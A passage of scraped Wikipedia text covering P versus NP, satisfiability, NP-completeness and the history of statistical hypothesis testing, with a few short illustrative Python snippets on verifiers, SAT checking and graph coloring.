in a way not excluded by the above results. These barriers lead some computer scientists to suggest the P versus NP problem may beindependentof standard axiom systems likeZFC(cannot be proved or disproved within them). 
An independence result could imply that either P ≠ NP and this is unprovable in (e.g.) ZFC, or that P = NP but it is unprovable in ZFC that any polynomial-time algorithms are correct.[45]However, if the problem is undecidable even with much weaker assumptions extending thePeano axiomsfor integer arithmetic, then nearly polynomial-time algorithms exist for all NP problems.[46]Therefore, assuming (as most complexity theorists do) some NP problems don't have efficient algorithms, proofs of independence with those techniques are impossible. This also implies proving independence from PA or ZFC with current techniques is no easier than proving all NP problems have efficient algorithms. The P = NP problem can be restated as certain classes of logical statements, as a result of work indescriptive complexity. Consider all languages of finite structures with a fixedsignatureincluding alinear orderrelation. Then, all such languages in P are expressible infirst-order logicwith the addition of a suitable leastfixed-point combinator. Recursive functions can be defined with this and the order relation. As long as the signature contains at least one predicate or function in addition to the distinguished order relation, so that the amount of space taken to store such finite structures is actually polynomial in the number of elements in the structure, this precisely characterizes P. Similarly, NP is the set of languages expressible in existentialsecond-order logic—that is, second-order logic restricted to excludeuniversal quantificationover relations, functions, and subsets. The languages in thepolynomial hierarchy,PH, correspond to all of second-order logic. Thus, the question "is P a proper subset of NP" can be reformulated as "is existential second-order logic able to describe languages (of finite linearly ordered structures with nontrivial signature) that first-order logic with least fixed point cannot?".[47]The word "existential" can even be dropped from the previous characterization, since P = NP if and only if P = PH (as the former would establish that NP = co-NP, which in turn implies that NP = PH). No known algorithm for a NP-complete problem runs in polynomial time. However, there are algorithms known for NP-complete problems that if P = NP, the algorithm runs in polynomial time on accepting instances (although with enormous constants, making the algorithm impractical). However, these algorithms do not qualify as polynomial time because their running time on rejecting instances are not polynomial. The following algorithm, due toLevin(without any citation), is such an example below. It correctly accepts the NP-complete languageSUBSET-SUM. It runs in polynomial time on inputs that are in SUBSET-SUM if and only if P = NP: This is a polynomial-time algorithm accepting an NP-complete language only if P = NP. "Accepting" means it gives "yes" answers in polynomial time, but is allowed to run forever when the answer is "no" (also known as asemi-algorithm). This algorithm is enormously impractical, even if P = NP. If the shortest program that can solve SUBSET-SUM in polynomial time isbbits long, the above algorithm will try at least2b− 1other programs first. Adecision problemis a problem that takes as input somestringwover an alphabet Σ, and outputs "yes" or "no". 
If there is an algorithm (say a Turing machine, or a computer program with unbounded memory) that produces the correct answer for any input string of length n in at most cn^k steps, where k and c are constants independent of the input string, then we say that the problem can be solved in polynomial time and we place it in the class P. Formally, P is the set of languages that can be decided by a deterministic polynomial-time Turing machine; that is, P = { L : L = L(M) for some deterministic polynomial-time Turing machine M }, where L(M) = { w ∈ Σ* : M accepts w }, and a deterministic polynomial-time Turing machine is a deterministic Turing machine M that satisfies two conditions: it halts on every input w, and there is a constant k such that it does so within O(|w|^k) steps. NP can be defined similarly using nondeterministic Turing machines (the traditional way). However, a modern approach uses the concept of certificate and verifier. Formally, NP is the set of languages over a finite alphabet that have a verifier running in polynomial time. The following defines a "verifier": Let L be a language over a finite alphabet Σ. L ∈ NP if, and only if, there exist a binary relation R ⊂ Σ* × Σ* and a positive integer k such that the following two conditions are satisfied: (1) for all x, x ∈ L if and only if there exists y with (x, y) ∈ R and |y| ∈ O(|x|^k); and (2) the language L_R = { x#y : (x, y) ∈ R } is decidable in polynomial time by a deterministic Turing machine. A Turing machine that decides L_R is called a verifier for L, and a y such that (x, y) ∈ R is called a certificate of membership of x in L. Not all verifiers must be polynomial-time. However, for L to be in NP, there must be a verifier that runs in polynomial time. As an example, let COMPOSITE = { x ∈ N : x = pq for integers p, q > 1 }. Whether a value of x is composite is equivalent to whether x is a member of COMPOSITE. It can be shown that COMPOSITE ∈ NP by verifying that it satisfies the above definition (if we identify natural numbers with their binary representations). COMPOSITE also happens to be in P, a fact demonstrated by the invention of the AKS primality test.[48] There are many equivalent ways of describing NP-completeness. Let L be a language over a finite alphabet Σ. L is NP-complete if, and only if, the following two conditions are satisfied: L ∈ NP, and every problem in NP is polynomial-time reducible to L. Alternatively, if L ∈ NP, and there is another NP-complete problem that can be polynomial-time reduced to L, then L is NP-complete. This is a common way of proving some new problem is NP-complete. While the P versus NP problem is generally considered unsolved,[49] many amateur and some professional researchers have claimed solutions. Gerhard J. Woeginger compiled a list of 116 purported proofs from 1986 to 2016, of which 61 were proofs of P = NP, 49 were proofs of P ≠ NP, and 6 proved other results, e.g. that the problem is undecidable.[50] Some attempts at resolving P versus NP have received brief media attention,[51] though these attempts have been refuted. The film Travelling Salesman, by director Timothy Lanzone, is the story of four mathematicians hired by the US government to solve the P versus NP problem.[52] In the sixth episode of The Simpsons' seventh season, "Treehouse of Horror VI", the equation P = NP is seen shortly after Homer accidentally stumbles into the "third dimension".[53][54] In the second episode of season 2 of Elementary, "Solve for X", Sherlock and Watson investigate the murders of mathematicians who were attempting to solve P versus NP.[55][56]
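Returning to the verifier-based definition of NP given above, here is a minimal sketch of a polynomial-time verifier showing COMPOSITE ∈ NP; the certificate is simply a nontrivial divisor, and the example numbers are arbitrary.

def composite_verifier(x, certificate):
    # Accept iff the certificate is a nontrivial divisor of x.
    # Runs in time polynomial in the length of the binary representation of x.
    return 1 < certificate < x and x % certificate == 0

print(composite_verifier(561, 3))   # True: 561 = 3 * 187, so 561 is composite
print(composite_verifier(13, 5))    # False: 5 does not divide 13

A certificate exists exactly when x is composite, which is what places COMPOSITE in NP; the AKS result mentioned above shows the stronger fact that no certificate is needed at all.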
https://en.wikipedia.org/wiki/P_vs_NP_problem
Inmathematical logic, aformulaissatisfiableif it is true under some assignment of values to itsvariables. For example, the formulax+3=y{\displaystyle x+3=y}is satisfiable because it is true whenx=3{\displaystyle x=3}andy=6{\displaystyle y=6}, while the formulax+1=x{\displaystyle x+1=x}is not satisfiable over the integers. The dual concept to satisfiability isvalidity; a formula isvalidif every assignment of values to its variables makes the formula true. For example,x+3=3+x{\displaystyle x+3=3+x}is valid over the integers, butx+3=y{\displaystyle x+3=y}is not. Formally, satisfiability is studied with respect to a fixed logic defining thesyntaxof allowed symbols, such asfirst-order logic,second-order logicorpropositional logic. Rather than being syntactic, however, satisfiability is asemanticproperty because it relates to themeaningof the symbols, for example, the meaning of+{\displaystyle +}in a formula such asx+1=x{\displaystyle x+1=x}. Formally, we define aninterpretation(ormodel) to be an assignment of values to the variables and an assignment of meaning to all other non-logical symbols, and a formula is said to be satisfiable if there is some interpretation which makes it true.[1]While this allows non-standard interpretations of symbols such as+{\displaystyle +}, one can restrict their meaning by providing additionalaxioms. Thesatisfiability modulo theoriesproblem considers satisfiability of a formula with respect to aformal theory, which is a (finite or infinite) set of axioms. Satisfiability and validity are defined for a single formula, but can be generalized to an arbitrary theory or set of formulas: a theory is satisfiable if at least one interpretation makes every formula in the theory true, and valid if every formula is true in every interpretation. For example, theories of arithmetic such asPeano arithmeticare satisfiable because they are true in the natural numbers. This concept is closely related to theconsistencyof a theory, and in fact is equivalent to consistency for first-order logic, a result known asGödel's completeness theorem. The negation of satisfiability is unsatisfiability, and the negation of validity is invalidity. These four concepts are related to each other in a manner exactly analogous toAristotle'ssquare of opposition. Theproblemof determining whether a formula inpropositional logicis satisfiable isdecidable, and is known as theBoolean satisfiability problem, or SAT. In general, the problem of determining whether a sentence offirst-order logicis satisfiable is not decidable. Inuniversal algebra,equational theory, andautomated theorem proving, the methods ofterm rewriting,congruence closureandunificationare used to attempt to decide satisfiability. Whether a particulartheoryis decidable or not depends whether the theory isvariable-freeand on other conditions.[2] Forclassical logicswith negation, it is generally possible to re-express the question of the validity of a formula to one involving satisfiability, because of the relationships between the concepts expressed in the above square of opposition. In particular φ is valid if and only if ¬φ is unsatisfiable, which is to say it is false that ¬φ is satisfiable. Put another way, φ is satisfiable if and only if ¬φ is invalid. For logics without negation, such as thepositive propositional calculus, the questions of validity and satisfiability may be unrelated. 
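For classical propositional logic, the duality just described (φ is valid if and only if ¬φ is unsatisfiable) can be checked mechanically by enumerating truth assignments. The following is a minimal sketch; the nested-tuple formula representation is an ad hoc choice made only for illustration.

from itertools import product

def evaluate(formula, assignment):
    # formula is a nested tuple: ("var", name), ("not", f), ("and", f, g) or ("or", f, g)
    op = formula[0]
    if op == "var":
        return assignment[formula[1]]
    if op == "not":
        return not evaluate(formula[1], assignment)
    if op == "and":
        return evaluate(formula[1], assignment) and evaluate(formula[2], assignment)
    if op == "or":
        return evaluate(formula[1], assignment) or evaluate(formula[2], assignment)

def variables(formula):
    if formula[0] == "var":
        return {formula[1]}
    return set().union(*(variables(sub) for sub in formula[1:]))

def satisfiable(formula):
    vs = sorted(variables(formula))
    return any(evaluate(formula, dict(zip(vs, bits)))
               for bits in product([False, True], repeat=len(vs)))

def valid(formula):
    # A formula is valid iff its negation is unsatisfiable.
    return not satisfiable(("not", formula))

p = ("var", "p")
print(satisfiable(("and", p, ("not", p))))   # False: a contradiction has no satisfying assignment
print(valid(("or", p, ("not", p))))          # True: the negation of excluded middle is unsatisfiable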
In the case of thepositive propositional calculus, the satisfiability problem is trivial, as every formula is satisfiable, while the validity problem isco-NP complete. In the case ofclassical propositional logic, satisfiability is decidable for propositional formulae. In particular, satisfiability is anNP-completeproblem, and is one of the most intensively studied problems incomputational complexity theory. Forfirst-order logic(FOL), satisfiability isundecidable. More specifically, it is aco-RE-completeproblem and therefore notsemidecidable.[3]This fact has to do with the undecidability of the validity problem for FOL. The question of the status of the validity problem was posed firstly byDavid Hilbert, as the so-calledEntscheidungsproblem. The universal validity of a formula is a semi-decidable problem byGödel's completeness theorem. If satisfiability were also a semi-decidable problem, then the problem of the existence of counter-models would be too (a formula has counter-models iff its negation is satisfiable). So the problem of logical validity would be decidable, which contradicts theChurch–Turing theorem, a result stating the negative answer for the Entscheidungsproblem. Inmodel theory, anatomic formulais satisfiable if there is a collection of elements of astructurethat render the formula true.[4]IfAis a structure, φ is a formula, andais a collection of elements, taken from the structure, that satisfy φ, then it is commonly written that If φ has no free variables, that is, if φ is anatomic sentence, and it is satisfied byA, then one writes In this case, one may also say thatAis a model for φ, or that φ istrueinA. IfTis a collection of atomic sentences (a theory) satisfied byA, one writes A problem related to satisfiability is that offinite satisfiability, which is the question of determining whether a formula admits afinitemodel that makes it true. For a logic that has thefinite model property, the problems of satisfiability and finite satisfiability coincide, as a formula of that logic has a model if and only if it has a finite model. This question is important in the mathematical field offinite model theory. Finite satisfiability and satisfiability need not coincide in general. For instance, consider thefirst-order logicformula obtained as theconjunctionof the following sentences, wherea0{\displaystyle a_{0}}anda1{\displaystyle a_{1}}areconstants: The resulting formula has the infinite modelR(a0,a1),R(a1,a2),…{\displaystyle R(a_{0},a_{1}),R(a_{1},a_{2}),\ldots }, but it can be shown that it has no finite model (starting at the factR(a0,a1){\displaystyle R(a_{0},a_{1})}and following the chain ofR{\displaystyle R}atomsthat must exist by the second axiom, the finiteness of a model would require the existence of a loop, which would violate the third and fourth axioms, whether it loops back ona0{\displaystyle a_{0}}or on a different element). Thecomputational complexityof deciding satisfiability for an input formula in a given logic may differ from that of deciding finite satisfiability; in fact, for some logics, only one of them isdecidable. For classicalfirst-order logic, finite satisfiability isrecursively enumerable(in classRE) andundecidablebyTrakhtenbrot's theoremapplied to the negation of the formula. Numerical constraints[clarify]often appear in the field ofmathematical optimization, where one usually wants to maximize (or minimize) an objective function subject to some constraints. 
However, leaving aside the objective function, the basic issue of simply deciding whether the constraints are satisfiable can be challenging or undecidable in some settings. The following table summarizes the main cases. Table source: Bockmayr and Weispfenning.[5]: 754 For linear constraints, a fuller picture is provided by the following table. Table source: Bockmayr and Weispfenning.[5]: 755
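As a hedged illustration of the kind of case those tables classify: deciding whether a system of linear inequalities has a real solution is a linear-programming feasibility question, solvable in polynomial time, whereas insisting on integer solutions makes the problem NP-hard in general. The particular constraints below are an arbitrary example, and the sketch assumes SciPy is available.

import numpy as np
from scipy.optimize import linprog

# Is there a real (x, y) with  x + 2y <= 4,  3x + y >= 3,  x >= 0,  y >= 0 ?
# Feasibility check: minimize the zero objective subject to the constraints.
A_ub = np.array([[1.0, 2.0],      # x + 2y <= 4
                 [-3.0, -1.0]])   # 3x + y >= 3, rewritten as -3x - y <= -3
b_ub = np.array([4.0, -3.0])
result = linprog(c=[0.0, 0.0], A_ub=A_ub, b_ub=b_ub, bounds=[(0, None), (0, None)])
print(result.success, result.x)   # True and one feasible point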
https://en.wikipedia.org/wiki/Satisfiability
Incomputational complexity theory, a problem isNP-completewhen: The name "NP-complete" is short for "nondeterministic polynomial-time complete". In this name, "nondeterministic" refers tonondeterministic Turing machines, a way of mathematically formalizing the idea of a brute-force search algorithm.Polynomial timerefers to an amount of time that is considered "quick" for adeterministic algorithmto check a single solution, or for a nondeterministic Turing machine to perform the whole search. "Complete" refers to the property of being able to simulate everything in the samecomplexity class. More precisely, each input to the problem should be associated with a set of solutions of polynomial length, the validity of each of which can be tested quickly (inpolynomial time),[2]such that the output for any input is "yes" if the solution set is non-empty and "no" if it is empty. The complexity class of problems of this form is calledNP, an abbreviation for "nondeterministic polynomial time". A problem is said to beNP-hardif everything in NP can be transformed in polynomial time into it even though it may not be in NP. A problem is NP-complete if it is both in NP and NP-hard. The NP-complete problems represent the hardest problems in NP. If some NP-complete problem has a polynomial time algorithm, all problems in NP do. The set of NP-complete problems is often denoted byNP-CorNPC. Although a solution to an NP-complete problem can beverified"quickly", there is no known way tofinda solution quickly. That is, the time required to solve the problem using any currently knownalgorithmincreases rapidly as the size of the problem grows. As a consequence, determining whether it is possible to solve these problems quickly, called theP versus NP problem, is one of the fundamentalunsolved problems in computer sciencetoday. While a method for computing the solutions to NP-complete problems quickly remains undiscovered,computer scientistsandprogrammersstill frequently encounter NP-complete problems. NP-complete problems are often addressed by usingheuristicmethods andapproximation algorithms. NP-complete problems are inNP, the set of alldecision problemswhose solutions can be verified in polynomial time;NPmay be equivalently defined as the set of decision problems that can be solved in polynomial time on anon-deterministic Turing machine. A problempin NP is NP-complete if every other problem in NP can be transformed (or reduced) intopin polynomial time.[citation needed] It is not known whether every problem in NP can be quickly solved—this is called theP versus NP problem. But ifany NP-complete problemcan be solved quickly, thenevery problem in NPcan, because the definition of an NP-complete problem states that every problem in NP must be quickly reducible to every NP-complete problem (that is, it can be reduced in polynomial time). Because of this, it is often said that NP-complete problems areharderormore difficultthan NP problems in general.[citation needed] A decision problemC{\displaystyle \scriptstyle C}is NP-complete if:[citation needed] C{\displaystyle \scriptstyle C}can be shown to be in NP by demonstrating that a candidate solution toC{\displaystyle \scriptstyle C}can be verified in polynomial time. 
Note that a problem satisfying condition 2 is said to beNP-hard, whether or not it satisfies condition 1.[4] A consequence of this definition is that if we had a polynomial time algorithm (on aUTM, or any otherTuring-equivalentabstract machine) forC{\displaystyle \scriptstyle C}, we could solve all problems in NP in polynomial time. The concept of NP-completeness was introduced in 1971 (seeCook–Levin theorem), though the termNP-completewas introduced later. At the 1971STOCconference, there was a fierce debate between the computer scientists about whether NP-complete problems could be solved in polynomial time on adeterministicTuring machine.John Hopcroftbrought everyone at the conference to a consensus that the question of whether NP-complete problems are solvable in polynomial time should be put off to be solved at some later date, since nobody had any formal proofs for their claims one way or the other.[citation needed]This is known as "the question of whether P=NP". Nobody has yet been able to determine conclusively whether NP-complete problems are in fact solvable in polynomial time, making this one of the greatunsolved problems of mathematics. TheClay Mathematics Instituteis offering a US$1 million reward (Millennium Prize) to anyone who has a formal proof that P=NP or that P≠NP.[5] The existence of NP-complete problems is not obvious. TheCook–Levin theoremstates that theBoolean satisfiability problemis NP-complete, thus establishing that such problems do exist. In 1972,Richard Karpproved that several other problems were also NP-complete (seeKarp's 21 NP-complete problems); thus, there is a class of NP-complete problems (besides the Boolean satisfiability problem). Since the original results, thousands of other problems have been shown to be NP-complete by reductions from other problems previously shown to be NP-complete; many of these problems are collected inGarey & Johnson (1979). The easiest way to prove that some new problem is NP-complete is first to prove that it is in NP, and then to reduce some known NP-complete problem to it. Therefore, it is useful to know a variety of NP-complete problems. The list below contains some well-known problems that are NP-complete when expressed as decision problems. To the right is a diagram of some of the problems and thereductionstypically used to prove their NP-completeness. In this diagram, problems are reduced from bottom to top. Note that this diagram is misleading as a description of the mathematical relationship between these problems, as there exists apolynomial-time reductionbetween any two NP-complete problems; but it indicates where demonstrating this polynomial-time reduction has been easiest. There is often only a small difference between a problem in P and an NP-complete problem. For example, the3-satisfiabilityproblem, a restriction of the Boolean satisfiability problem, remains NP-complete, whereas the slightly more restricted2-satisfiabilityproblem is in P (specifically, it isNL-complete), but the slightly more general max. 2-sat. problem is again NP-complete. Determining whether a graph can be colored with 2 colors is in P, but with 3 colors is NP-complete, even when restricted toplanar graphs. Determining if a graph is acycleor isbipartiteis very easy (inL), but finding a maximum bipartite or a maximum cycle subgraph is NP-complete. A solution of theknapsack problemwithin any fixed percentage of the optimal solution can be computed in polynomial time, but finding the optimal solution is NP-complete. 
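The 2-color versus 3-color boundary mentioned above can be made concrete in a few lines of Python (the graphs are arbitrary examples): 2-colorability is just a breadth-first bipartiteness check, while the obvious exact method for 3-colorability tries exponentially many assignments, and no polynomial-time algorithm for it is known.

from collections import deque
from itertools import product

def two_colorable(graph):
    # Polynomial time: breadth-first search assigning alternating colors.
    color = {}
    for start in graph:
        if start in color:
            continue
        color[start] = 0
        queue = deque([start])
        while queue:
            u = queue.popleft()
            for v in graph[u]:
                if v not in color:
                    color[v] = 1 - color[u]
                    queue.append(v)
                elif color[v] == color[u]:
                    return False
    return True

def three_colorable(graph):
    # Brute force: examines up to 3**n assignments.
    nodes = list(graph)
    for assignment in product(range(3), repeat=len(nodes)):
        coloring = dict(zip(nodes, assignment))
        if all(coloring[u] != coloring[v] for u in graph for v in graph[u]):
            return coloring
    return None

triangle = {"a": ["b", "c"], "b": ["a", "c"], "c": ["a", "b"]}
print(two_colorable(triangle), three_colorable(triangle) is not None)   # False True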
An interesting example is thegraph isomorphism problem, thegraph theoryproblem of determining whether agraph isomorphismexists between two graphs. Two graphs areisomorphicif one can betransformedinto the other simply by renamingvertices. Consider these two problems: The Subgraph Isomorphism problem is NP-complete. The graph isomorphism problem is suspected to be neither in P nor NP-complete, though it is in NP. This is an example of a problem that is thought to behard, but is not thought to be NP-complete. This class is calledNP-Intermediate problemsand exists if and only if P≠NP. At present, all known algorithms for NP-complete problems require time that issuperpolynomialin the input size. Thevertex coverproblem hasO(1.2738k+nk){\displaystyle O(1.2738^{k}+nk)}[6]for somek>0{\displaystyle k>0}and it is unknown whether there are any faster algorithms. The following techniques can be applied to solve computational problems in general, and they often give rise to substantially faster algorithms: One example of a heuristic algorithm is a suboptimalO(nlog⁡n){\displaystyle O(n\log n)}greedy coloring algorithmused forgraph coloringduring theregister allocationphase of some compilers, a technique calledgraph-coloring global register allocation. Each vertex is a variable, edges are drawn between variables which are being used at the same time, and colors indicate the register assigned to each variable. Because mostRISCmachines have a fairly large number of general-purpose registers, even a heuristic approach is effective for this application. In the definition of NP-complete given above, the termreductionwas used in the technical meaning of a polynomial-timemany-one reduction. Another type of reduction is polynomial-timeTuring reduction. A problemX{\displaystyle \scriptstyle X}is polynomial-time Turing-reducible to a problemY{\displaystyle \scriptstyle Y}if, given a subroutine that solvesY{\displaystyle \scriptstyle Y}in polynomial time, one could write a program that calls this subroutine and solvesX{\displaystyle \scriptstyle X}in polynomial time. This contrasts with many-one reducibility, which has the restriction that the program can only call the subroutine once, and the return value of the subroutine must be the return value of the program. If one defines the analogue to NP-complete with Turing reductions instead of many-one reductions, the resulting set of problems won't be smaller than NP-complete; it is an open question whether it will be any larger. Another type of reduction that is also often used to define NP-completeness is thelogarithmic-space many-one reductionwhich is a many-one reduction that can be computed with only a logarithmic amount of space. Since every computation that can be done inlogarithmic spacecan also be done in polynomial time it follows that if there is a logarithmic-space many-one reduction then there is also a polynomial-time many-one reduction. This type of reduction is more refined than the more usual polynomial-time many-one reductions and it allows us to distinguish more classes such asP-complete. Whether under these types of reductions the definition of NP-complete changes is still an open problem. All currently known NP-complete problems are NP-complete under log space reductions. All currently known NP-complete problems remain NP-complete even under much weaker reductions such asAC0{\displaystyle AC_{0}}reductions andNC0{\displaystyle NC_{0}}reductions. 
Some NP-Complete problems such as SAT are known to be complete even under polylogarithmic time projections.[7]It is known, however, thatAC0reductions define a strictly smaller class than polynomial-time reductions.[8] According toDonald Knuth, the name "NP-complete" was popularized byAlfred Aho,John HopcroftandJeffrey Ullmanin their celebrated textbook "The Design and Analysis of Computer Algorithms". He reports that they introduced the change in thegalley proofsfor the book (from "polynomially-complete"), in accordance with the results of a poll he had conducted of thetheoretical computer sciencecommunity.[9]Other suggestions made in the poll[10]included "Herculean", "formidable",Steiglitz's "hard-boiled" in honor of Cook, and Shen Lin's acronym "PET", which stood for "probably exponential time", but depending on which way theP versus NP problemwent, could stand for "provably exponential time" or "previously exponential time".[11] The following misconceptions are frequent.[12] Viewing adecision problemas a formal language in some fixed encoding, the set NPC of all NP-complete problems isnot closedunder: It is not known whether NPC is closed undercomplementation, since NPC=co-NPCif and only if NP=co-NP, and since NP=co-NP is anopen question.[16]
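A minimal sketch of the greedy coloring heuristic mentioned earlier in connection with register allocation (the interference graph below is an invented example): each vertex simply receives the smallest color not already used by a neighbor. The result is not guaranteed to be optimal, which is acceptable when registers are plentiful.

def greedy_coloring(graph, order=None):
    # Assign each vertex the smallest color index not used by an already-colored neighbor.
    colors = {}
    for v in (order or list(graph)):
        taken = {colors[u] for u in graph[v] if u in colors}
        colors[v] = next(c for c in range(len(graph)) if c not in taken)
    return colors

# Variables that are live at the same time "interfere" and need different registers.
interference = {
    "a": ["b", "c"],
    "b": ["a", "c", "d"],
    "c": ["a", "b"],
    "d": ["b"],
}
assignment = greedy_coloring(interference)
print(assignment, "registers used:", len(set(assignment.values())))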
https://en.wikipedia.org/wiki/NP-completeness
Astatistical hypothesis testis a method of statistical inference used to decide whether the data provide sufficient evidence to reject a particular hypothesis. A statistical hypothesis test typically involves a calculation of atest statistic. Then a decision is made, either by comparing the test statistic to acritical valueor equivalently by evaluating ap-valuecomputed from the test statistic. Roughly 100specialized statistical testsare in use and noteworthy.[1][2] While hypothesis testing was popularized early in the 20th century, early forms were used in the 1700s. The first use is credited toJohn Arbuthnot(1710),[3]followed byPierre-Simon Laplace(1770s), in analyzing thehuman sex ratioat birth; see§ Human sex ratio. Paul Meehlhas argued that theepistemologicalimportance of the choice of null hypothesis has gone largely unacknowledged. When the null hypothesis is predicted by theory, a more precise experiment will be a more severe test of the underlying theory. When the null hypothesis defaults to "no difference" or "no effect", a more precise experiment is a less severe test of the theory that motivated performing the experiment.[4]An examination of the origins of the latter practice may therefore be useful: 1778:Pierre Laplacecompares the birthrates of boys and girls in multiple European cities. He states: "it is natural to conclude that these possibilities are very nearly in the same ratio". Thus, the null hypothesis in this case that the birthrates of boys and girls should be equal given "conventional wisdom".[5] 1900:Karl Pearsondevelops thechi squared testto determine "whether a given form of frequency curve will effectively describe the samples drawn from a given population." Thus the null hypothesis is that a population is described by some distribution predicted by theory. He uses as an example the numbers of five and sixes in theWeldon dice throw data.[6] 1904:Karl Pearsondevelops the concept of "contingency" in order to determine whether outcomes areindependentof a given categorical factor. Here the null hypothesis is by default that two things are unrelated (e.g. scar formation and death rates from smallpox).[7]The null hypothesis in this case is no longer predicted by theory or conventional wisdom, but is instead theprinciple of indifferencethat ledFisherand others to dismiss the use of "inverse probabilities".[8] Modern significance testing is largely the product ofKarl Pearson(p-value,Pearson's chi-squared test),William Sealy Gosset(Student's t-distribution), andRonald Fisher("null hypothesis",analysis of variance, "significance test"), while hypothesis testing was developed byJerzy NeymanandEgon Pearson(son of Karl). Ronald Fisher began his life in statistics as a Bayesian (Zabell 1992), but Fisher soon grew disenchanted with the subjectivity involved (namely use of theprinciple of indifferencewhen determining prior probabilities), and sought to provide a more "objective" approach to inductive inference.[9] Fisher emphasized rigorous experimental design and methods to extract a result from few samples assumingGaussian distributions. Neyman (who teamed with the younger Pearson) emphasized mathematical rigor and methods to obtain more results from many samples and a wider range of distributions. Modern hypothesis testing is an inconsistent hybrid of the Fisher vs Neyman/Pearson formulation, methods and terminology developed in the early 20th century. Fisher popularized the "significance test". 
He required a null-hypothesis (corresponding to a population frequency distribution) and a sample. His (now familiar) calculations determined whether to reject the null-hypothesis or not. Significance testing did not utilize an alternative hypothesis so there was no concept of aType II error(false negative). Thep-value was devised as an informal, but objective, index meant to help a researcher determine (based on other knowledge) whether to modify future experiments or strengthen one'sfaithin the null hypothesis.[10]Hypothesis testing (and Type I/II errors) was devised by Neyman and Pearson as a more objective alternative to Fisher'sp-value, also meant to determine researcher behaviour, but without requiring anyinductive inferenceby the researcher.[11][12] Neyman & Pearson considered a different problem to Fisher (which they called "hypothesis testing"). They initially considered two simple hypotheses (both with frequency distributions). They calculated two probabilities and typically selected the hypothesis associated with the higher probability (the hypothesis more likely to have generated the sample). Their method always selected a hypothesis. It also allowed the calculation of both types of error probabilities. Fisher and Neyman/Pearson clashed bitterly. Neyman/Pearson considered their formulation to be an improved generalization of significance testing (the defining paper[11]wasabstract; Mathematicians have generalized and refined the theory for decades[13]). Fisher thought that it was not applicable to scientific research because often, during the course of the experiment, it is discovered that the initial assumptions about the null hypothesis are questionable due to unexpected sources of error. He believed that the use of rigid reject/accept decisions based on models formulated before data is collected was incompatible with this common scenario faced by scientists and attempts to apply this method to scientific research would lead to mass confusion.[14] The dispute between Fisher and Neyman–Pearson was waged on philosophical grounds, characterized by a philosopher as a dispute over the proper role of models in statistical inference.[15] Events intervened: Neyman accepted a position in theUniversity of California, Berkeleyin 1938, breaking his partnership with Pearson and separating the disputants (who had occupied the same building).World War IIprovided an intermission in the debate. The dispute between Fisher and Neyman terminated (unresolved after 27 years) with Fisher's death in 1962. Neyman wrote a well-regarded eulogy.[16]Some of Neyman's later publications reportedp-values and significance levels.[17] The modern version of hypothesis testing is generally called thenull hypothesis significance testing (NHST)[18]and is a hybrid of the Fisher approach with the Neyman-Pearson approach. In 2000,Raymond S. Nickersonwrote an article stating that NHST was (at the time) "arguably the most widely used method of analysis of data collected in psychological experiments and has been so for about 70 years" and that it was at the same time "very controversial".[18] This fusion resulted from confusion by writers of statistical textbooks (as predicted by Fisher) beginning in the 1940s[19](butsignal detection, for example, still uses the Neyman/Pearson formulation). Great conceptual differences and many caveats in addition to those mentioned above were ignored. 
Neyman and Pearson provided the stronger terminology, the more rigorous mathematics and the more consistent philosophy, but the subject taught today in introductory statistics has more similarities with Fisher's method than theirs.[20] Sometime around 1940,[19]authors of statistical text books began combining the two approaches by using thep-value in place of thetest statistic(or data) to test against the Neyman–Pearson "significance level". Hypothesis testing and philosophy intersect.Inferential statistics, which includes hypothesis testing, is applied probability. Both probability and its application are intertwined with philosophy. PhilosopherDavid Humewrote, "All knowledge degenerates into probability." Competing practical definitions ofprobabilityreflect philosophical differences. The most common application of hypothesis testing is in the scientific interpretation of experimental data, which is naturally studied by thephilosophy of science. Fisher and Neyman opposed the subjectivity of probability. Their views contributed to the objective definitions. The core of their historical disagreement was philosophical. Many of the philosophical criticisms of hypothesis testing are discussed by statisticians in other contexts, particularlycorrelation does not imply causationand thedesign of experiments. Hypothesis testing is of continuing interest to philosophers.[15][21] Statistics is increasingly being taught in schools with hypothesis testing being one of the elements taught.[22][23]Many conclusions reported in the popular press (political opinion polls to medical studies) are based on statistics. Some writers have stated that statistical analysis of this kind allows for thinking clearly about problems involving mass data, as well as the effective reporting of trends and inferences from said data, but caution that writers for a broad public should have a solid understanding of the field in order to use the terms and concepts correctly.[24][25]An introductory college statistics class places much emphasis on hypothesis testing – perhaps half of the course. Such fields as literature and divinity now include findings based on statistical analysis (see theBible Analyzer). An introductory statistics class teaches hypothesis testing as a cookbook process. Hypothesis testing is also taught at the postgraduate level. Statisticians learn how to create good statistical test procedures (likez, Student'st,Fand chi-squared). Statistical hypothesis testing is considered a mature area within statistics,[26]but a limited amount of development continues. An academic study states that the cookbook method of teaching introductory statistics leaves no time for history, philosophy or controversy. Hypothesis testing has been taught as received unified method. Surveys showed that graduates of the class were filled with philosophical misconceptions (on all aspects of statistical inference) that persisted among instructors.[27]While the problem was addressed more than a decade ago,[28]and calls for educational reform continue,[29]students still graduate from statistics classes holding fundamental misconceptions about hypothesis testing.[30]Ideas for improving the teaching of hypothesis testing include encouraging students to search for statistical errors in published papers, teaching the history of statistics and emphasizing the controversy in a generally dry subject.[31] Raymond S. 
Nickerson commented: The debate about NHST has its roots in unresolved disagreements among major contributors to the development of theories of inferential statistics on which modern approaches are based.Gigerenzeret al. (1989) have reviewed in considerable detail the controversy between R. A. Fisher on the one hand and Jerzy Neyman and Egon Pearson on the other as well as the disagreements between both of these views and those of the followers of Thomas Bayes. They noted the remarkable fact that little hint of the historical and ongoing controversy is to be found in most textbooks that are used to teach NHST to its potential users. The resulting lack of an accurate historical perspective and understanding of the complexity and sometimes controversial philosophical foundations of various approaches to statistical inference may go a long way toward explaining the apparent ease with which statistical tests are misused and misinterpreted.[18] The typical steps involved in performing a frequentist hypothesis test in practice are: The difference in the two processes applied to the radioactive suitcase example (below): The former report is adequate, the latter gives a more detailed explanation of the data and the reason why the suitcase is being checked. Not rejecting the null hypothesis does not mean the null hypothesis is "accepted" per se (though Neyman and Pearson used that word in their original writings; see theInterpretationsection). The processes described here are perfectly adequate for computation. They seriously neglect thedesign of experimentsconsiderations.[33][34] It is particularly critical that appropriate sample sizes be estimated before conducting the experiment. The phrase "test of significance" was coined by statisticianRonald Fisher.[35] When the null hypothesis is true and statistical assumptions are met, the probability that the p-value will be less than or equal to the significance levelα{\displaystyle \alpha }is at mostα{\displaystyle \alpha }. This ensures that the hypothesis test maintains its specified false positive rate (provided that statistical assumptions are met).[36] Thep-value is the probability that a test statistic which is at least as extreme as the one obtained would occur under the null hypothesis. At a significance level of 0.05, a fair coin would be expected to (incorrectly) reject the null hypothesis (that 